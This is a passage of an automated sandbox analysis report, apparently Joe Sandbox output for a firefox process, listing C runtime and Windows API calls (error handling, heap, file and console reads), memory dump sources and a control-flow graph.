      • Part of subcall function 6E0A4E50: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7,?), ref: 6E0A4E54
      • Part of subcall function 6E0A4E50: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0A4E91
      • Part of subcall function 6E0A4E50: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0A4EA2
      • Part of subcall function 6E0A4E50: _calloc_base.UCRTBASE(00000002,00000364,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?), ref: 6E0E03E0
      • Part of subcall function 6E0A4E50: _free_base.UCRTBASE(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0E040B
      • Part of subcall function 6E0A4E50: _free_base.UCRTBASE(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0E042A
    • _errno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E33D3
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,00000000,?,6E0E5DEB), ref: 6E0ACF48
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,?,6E0E5DEB), ref: 6E0ACF7B
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF91
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF98
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACFB4
      • Part of subcall function 6E0ACF40: _calloc_base.UCRTBASE(00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E5A5C
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5A8A
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5AA9
    • __doserrno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E33E3
    • _errno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E33EB
    • __doserrno.UCRTBASE ref: 6E0E3403
    • _errno.UCRTBASE ref: 6E0E340A
    • _invalid_parameter_noinfo.UCRTBASE ref: 6E0E3415
    • _malloc_base.UCRTBASE(00000004), ref: 6E0E342F
      • Part of subcall function 6E0B36C0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?), ref: 6E0B36DF
      • Part of subcall function 6E0B36C0: _callnewh.UCRTBASE(00000001,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E82F9
      • Part of subcall function 6E0B36C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E830E
      • Part of subcall function 6E0B36C0: _errno.UCRTBASE(?,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E831D
    • _free_base.UCRTBASE(00000000,?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0A8C61
      • Part of subcall function 6E0B10E0: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0B10F5
      • Part of subcall function 6E0B10E0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71DB
      • Part of subcall function 6E0B10E0: _errno.UCRTBASE(?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71EA
    • _free_base.UCRTBASE(00000000), ref: 6E0E3439
    • _free_base.UCRTBASE(00000000), ref: 6E0E3441
    • _errno.UCRTBASE ref: 6E0E344F
    • __doserrno.UCRTBASE ref: 6E0E345A
      • Part of subcall function 6E0BC0D3: _get_osfhandle.UCRTBASE(?,?,?,?,?,?,6E0E5279,00000000,00000000,?,?,?,?,6E0A38D7,?,?), ref: 6E0BC0E4
      • Part of subcall function 6E0BC0D3: _errno.UCRTBASE(?,?,?,?,?,6E0E5279,00000000,00000000,?,?,?,?,6E0A38D7,?,?,?), ref: 6E0EA3C0
    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 6E0E355E
    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 6E0E358A
    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 6E0E3594
      • Part of subcall function 6E0A4DFB: __doserrno.UCRTBASE(?,6E0EA3DD,?,6E0BC104,?,?,?,?,?,?,?,6E0E5279,00000000,00000000,?,?), ref: 6E0A4E00
      • Part of subcall function 6E0A4DFB: _errno.UCRTBASE(?,6E0EA3DD,?,6E0BC104,?,?,?,?,?,?,?,6E0E5279,00000000,00000000,?,?), ref: 6E0A4E10
      • Part of subcall function 6E106FC8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000002,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 6E1070B2
      • Part of subcall function 6E0A638B: _errno.UCRTBASE(?,00000000,?,?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E0DE7
      • Part of subcall function 6E0A638B: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E0DF4
      • Part of subcall function 6E0A638B: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,-00000001,?,?,?,00000000,?,?,?,?,?,00000000,?,6E0A3AE4), ref: 6E0E0E62
    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 6E0E35DC
    • _errno.UCRTBASE ref: 6E0E35E9
    • __doserrno.UCRTBASE ref: 6E0E35F4
    • __doserrno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E3609
    • _errno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E3611
    • _invalid_parameter_noinfo.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E361C
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd

    Control-flow Graph

    APIs
    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000), ref: 6E0A5D41
    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 6E0A5D5C
    • _errno.UCRTBASE ref: 6E0E09C1
      • Part of subcall function 6E0A623F: SetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000000,00000000,?,00000180,6E0A5D8D), ref: 6E0E0D34
      • Part of subcall function 6E0A623F: _errno.UCRTBASE(00000000,?,00000180,6E0A5D8D), ref: 6E0E0D3F
      • Part of subcall function 6E0A623F: __doserrno.UCRTBASE(00000000,?,00000180,6E0A5D8D), ref: 6E0E0D4A
      • Part of subcall function 6E0A61A8: _get_fmode.UCRTBASE(?,?,?,00000180,?,?,?,?,?,?,?,00000180,?,00000000,?,?), ref: 6E0A61F9
      • Part of subcall function 6E0A61A8: _invoke_watson.UCRTBASE(00000000,00000000,00000000,00000000,00000000,?,?,00000180,?,?,?,?,?,?,?,00000180), ref: 6E0E0B4E
      • Part of subcall function 6E0A61A8: _errno.UCRTBASE(?,?,00000180), ref: 6E0E0C57
      • Part of subcall function 6E0A61A8: _errno.UCRTBASE(?,?,00000180), ref: 6E0E0C62
      • Part of subcall function 6E0A61A8: _write.UCRTBASE(?,?), ref: 6E0E0D18
    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 6E0A5ED4
      • Part of subcall function 6E0A4DFB: __doserrno.UCRTBASE(?,6E0EA3DD,?,6E0BC104,?,?,?,?,?,?,?,6E0E5279,00000000,00000000,?,?), ref: 6E0A4E00
      • Part of subcall function 6E0A4DFB: _errno.UCRTBASE(?,6E0EA3DD,?,6E0BC104,?,?,?,?,?,?,?,6E0E5279,00000000,00000000,?,?), ref: 6E0A4E10
    • _errno.UCRTBASE ref: 6E0A5EE1
    • __doserrno.UCRTBASE(?,00000180,?,00000000,?,?,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001,?,6E0A5A19), ref: 6E0E0918
      • Part of subcall function 6E0A4E50: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7,?), ref: 6E0A4E54
      • Part of subcall function 6E0A4E50: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0A4E91
      • Part of subcall function 6E0A4E50: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0A4EA2
      • Part of subcall function 6E0A4E50: _calloc_base.UCRTBASE(00000002,00000364,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?), ref: 6E0E03E0
      • Part of subcall function 6E0A4E50: _free_base.UCRTBASE(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0E040B
      • Part of subcall function 6E0A4E50: _free_base.UCRTBASE(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0E042A
      • Part of subcall function 6E0A5EEF: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(6E1564A0,6E1424C8,0000001C,6E0A5CEA,?,00000180,?,00000000,?,?,?,6E0BDF2B,00000000,00000180,00000000,?), ref: 6E0A5F00
      • Part of subcall function 6E0A5EEF: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000030,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001,?,6E0A5A19,?,?,?), ref: 6E0A5F4E
      • Part of subcall function 6E0A5EEF: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001,?,6E0A5A19,?,?,?), ref: 6E0E0AAD
      • Part of subcall function 6E0A5EEF: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000030,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001,?,6E0A5A19,?,?,?), ref: 6E0E0AC5
    • __doserrno.UCRTBASE(?,00000180,?,00000000,?,?,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001,?,6E0A5A19), ref: 6E0E0927
    • _errno.UCRTBASE(?,00000180,?,00000000,?,?,?,6E0BDF2B,00000000,00000180,00000000,?,?,00000001,?,6E0A5A19), ref: 6E0E0931
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,00000000,?,6E0E5DEB), ref: 6E0ACF48
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,?,6E0E5DEB), ref: 6E0ACF7B
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF91
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF98
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACFB4
      • Part of subcall function 6E0ACF40: _calloc_base.UCRTBASE(00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E5A5C
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5A8A
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5AA9
    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000), ref: 6E0E0970
    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 6E0E098A
    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 6E0E09B3
    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000180,?,00000000,?), ref: 6E0E09F7
    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000), ref: 6E0E0A1A
    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00000180,?,00000000,?,?), ref: 6E0E0A27
      • Part of subcall function 6E0BBFFD: SetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000000,00000000,?,6E0BBFD3,?,00000000,?,6E0E09EC), ref: 6E0EA363
      • Part of subcall function 6E0BBFFD: _errno.UCRTBASE(00000000,?,6E0BBFD3,?,00000000,?,6E0E09EC), ref: 6E0EA36E
      • Part of subcall function 6E0BBFFD: __doserrno.UCRTBASE(00000000,?,6E0BBFD3,?,00000000,?,6E0E09EC), ref: 6E0EA379
      • Part of subcall function 6E0A62BF: _errno.UCRTBASE(00000000,?,00000180,?,?,6E0A5DDA), ref: 6E0A6348
      • Part of subcall function 6E0A62BF: __doserrno.UCRTBASE(00000000,?,00000180,?,?,6E0A5DDA), ref: 6E0E0D5A
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd

    Control-flow Graph

    APIs
    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD), ref: 6E0A89DD
    • __doserrno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E32B7
      • Part of subcall function 6E0A4E50: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7,?), ref: 6E0A4E54
      • Part of subcall function 6E0A4E50: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0A4E91
      • Part of subcall function 6E0A4E50: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0A4EA2
      • Part of subcall function 6E0A4E50: _calloc_base.UCRTBASE(00000002,00000364,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?), ref: 6E0E03E0
      • Part of subcall function 6E0A4E50: _free_base.UCRTBASE(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0E040B
      • Part of subcall function 6E0A4E50: _free_base.UCRTBASE(00000000,?,?,6E0E51DA,6E1426D0,00000014,6E0AAA5D,00000000,00000000,00000001,?,00000000,?,?,?,6E0AB8B7), ref: 6E0E042A
    • _errno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E32BF
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(0000000A,?,00000000,?,6E0E5DEB), ref: 6E0ACF48
      • Part of subcall function 6E0ACF40: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,?,6E0E5DEB), ref: 6E0ACF7B
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF91
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACF98
      • Part of subcall function 6E0ACF40: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,6E0E5DEB), ref: 6E0ACFB4
      • Part of subcall function 6E0ACF40: _calloc_base.UCRTBASE(00000002,00000364,?,00000000,?,6E0E5DEB), ref: 6E0E5A5C
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5A8A
      • Part of subcall function 6E0ACF40: _free_base.UCRTBASE(00000000,?,00000000,?,6E0E5DEB), ref: 6E0E5AA9
    • __doserrno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E32CC
    • _errno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E32D4
    • _errno.UCRTBASE(?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E32E1
    • __doserrno.UCRTBASE(?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E32EC
      • Part of subcall function 6E0A8B33: _isatty.UCRTBASE(?), ref: 6E0A8C07
      • Part of subcall function 6E0A8B33: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,00000000), ref: 6E0A8C2B
      • Part of subcall function 6E0A8B33: _free_base.UCRTBASE(00000000,?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0A8C61
      • Part of subcall function 6E0A8B33: __doserrno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E33CB
      • Part of subcall function 6E0A8B33: _errno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E33D3
      • Part of subcall function 6E0A8B33: __doserrno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E33E3
      • Part of subcall function 6E0A8B33: _errno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E33EB
      • Part of subcall function 6E0A8B33: __doserrno.UCRTBASE ref: 6E0E3403
      • Part of subcall function 6E0A8B33: _errno.UCRTBASE ref: 6E0E340A
      • Part of subcall function 6E0A8B33: _invalid_parameter_noinfo.UCRTBASE ref: 6E0E3415
      • Part of subcall function 6E0A8B33: _malloc_base.UCRTBASE(00000004), ref: 6E0E342F
      • Part of subcall function 6E0A8B33: _free_base.UCRTBASE(00000000), ref: 6E0E3439
      • Part of subcall function 6E0A8B33: _free_base.UCRTBASE(00000000), ref: 6E0E3441
      • Part of subcall function 6E0A8B33: _errno.UCRTBASE ref: 6E0E344F
      • Part of subcall function 6E0A8B33: __doserrno.UCRTBASE ref: 6E0E345A
      • Part of subcall function 6E0A8B33: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 6E0E355E
      • Part of subcall function 6E0A8B33: ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 6E0E358A
      • Part of subcall function 6E0A8B33: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 6E0E3594
      • Part of subcall function 6E0A8B33: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 6E0E35DC
      • Part of subcall function 6E0A8B33: _errno.UCRTBASE ref: 6E0E35E9
      • Part of subcall function 6E0A8B33: __doserrno.UCRTBASE ref: 6E0E35F4
      • Part of subcall function 6E0A8B33: __doserrno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E3609
      • Part of subcall function 6E0A8B33: _errno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E3611
      • Part of subcall function 6E0A8B33: _invalid_parameter_noinfo.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E361C
      • Part of subcall function 6E0A8A29: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,6E0A8A21,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64,6E0A39CD,?,6E0DFACD,?,00000000,?,6E0A3AE4), ref: 6E0A8A3C
    • __doserrno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E3304
    • _errno.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E330C
    • _invalid_parameter_noinfo.UCRTBASE(6E142548,00000014,6E0A8ABF,00000000,00000000,?,00000001,?,6E0A39CD,6E0A39CD,?,6E0A3FCA,?,6E0A39CD,?,6E0A3F64), ref: 6E0E3317
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 510 6e0b6907-6e0b691f call 6e0b36c0 512 6e0b6924-6e0b692b 510->512 513 6e0b6a3f-6e0b6a44 512->513 514 6e0b6931-6e0b6966 call 6e0b6a54 512->514 517 6e0b6969-6e0b697e wcscat_s 514->517 518 6e0b6984-6e0b698f 517->518 519 6e0e8f3e-6e0e8f60 _invoke_watson * 2 517->519 521 6e0b6991-6e0b6997 518->521 522 6e0b699d-6e0b69a0 521->522 523 6e0b6a45-6e0b6a4a 521->523 524 6e0b69a2-6e0b69aa 522->524 525 6e0b69bb 522->525 526 6e0b69bd-6e0b69f6 call 6e0b6a54 523->526 524->523 527 6e0b69b0-6e0b69b9 524->527 525->526 526->517 530 6e0b69fc-6e0b6a00 526->530 527->521 527->525 531 6e0e8ece-6e0e8ed6 530->531 532 6e0b6a06-6e0b6a15 call 6e0b10e0 530->532 533 6e0e8ed8-6e0e8ede 531->533 534 6e0e8ee9-6e0e8eee 531->534 542 6e0b6a1b-6e0b6a20 532->542 543 6e0e8f16-6e0e8f1c 532->543 533->534 536 6e0e8ee0-6e0e8ee8 call 6e0b10e0 533->536 537 6e0e8ef0-6e0e8ef5 534->537 538 6e0e8f00-6e0e8f0e 534->538 536->534 537->538 541 6e0e8ef7-6e0e8eff call 6e0b10e0 537->541 538->543 541->538 547 6e0b6a2d-6e0b6a3e 542->547 548 6e0b6a22-6e0b6a27 542->548 543->542 546 6e0e8f22-6e0e8f2b call 6e0b10e0 543->546 546->542 547->513 548->547 551 6e0e8f30-6e0e8f39 call 6e0b10e0 548->551 551->547
    APIs
    • _malloc_base.UCRTBASE(000006A6,00000000), ref: 6E0B691F
      • Part of subcall function 6E0B36C0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?), ref: 6E0B36DF
      • Part of subcall function 6E0B36C0: _callnewh.UCRTBASE(00000001,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E82F9
      • Part of subcall function 6E0B36C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E830E
      • Part of subcall function 6E0B36C0: _errno.UCRTBASE(?,?,6E0E59A3,00000001,0000DDDD,?,?,6E0FCA06,?,00000001,?,00000001,00000001,?,00000000), ref: 6E0E831D
      • Part of subcall function 6E0B6A54: wcscat_s.UCRTBASE(6E087448,00000002,?,?,00000000,6E0B703D,?,6E0B85B8,?,00000083,00000002,6E087448,6E0B703D,?,6E0B713D,?), ref: 6E0B6A73
      • Part of subcall function 6E0B6A54: _invoke_watson.UCRTBASE(00000000,00000000,00000000,00000000,00000000,00000002,6E087448,6E0B703D,?,6E0B713D,?,?,?,?,?), ref: 6E0E8F50
    • wcscat_s.UCRTBASE(00000000,00000351,6E086E40,?,?,?,?,00000000), ref: 6E0B6974
      • Part of subcall function 6E0C06F0: _errno.UCRTBASE(?,00000000,00000000,?,6E0B6A78,6E087448,00000002,?,?,00000000,6E0B703D,?,6E0B85B8,?,00000083,00000002), ref: 6E0C0712
      • Part of subcall function 6E0C06F0: _invalid_parameter_noinfo.UCRTBASE(?,00000000,00000000,?,6E0B6A78,6E087448,00000002,?,?,00000000,6E0B703D,?,6E0B85B8,?,00000083,00000002), ref: 6E0C071C
      • Part of subcall function 6E0C06F0: _errno.UCRTBASE(?,00000000,00000000,?,6E0B6A78,6E087448,00000002,?,?,00000000,6E0B703D,?,6E0B85B8,?,00000083,00000002), ref: 6E0C075C
    • _free_base.UCRTBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E0B6A07
    • _free_base.UCRTBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E0E8EE3
    • _free_base.UCRTBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E0E8F33
      • Part of subcall function 6E0B10E0: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0B10F5
      • Part of subcall function 6E0B10E0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71DB
      • Part of subcall function 6E0B10E0: _errno.UCRTBASE(?,6E0E5A8F,00000000,?,00000000,?,6E0E5DEB), ref: 6E0E71EA
    • _free_base.UCRTBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E0E8EFA
    • _free_base.UCRTBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E0E8F25
    • _invoke_watson.UCRTBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 6E0E8F45
      • Part of subcall function 6E107FA0: IsProcessorFeaturePresent.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000017,00000000,6E107E9E,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6E107F6B), ref: 6E107FA5
      • Part of subcall function 6E107FA0: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000417,?,?,?,?,6E107F6B), ref: 6E107FC6
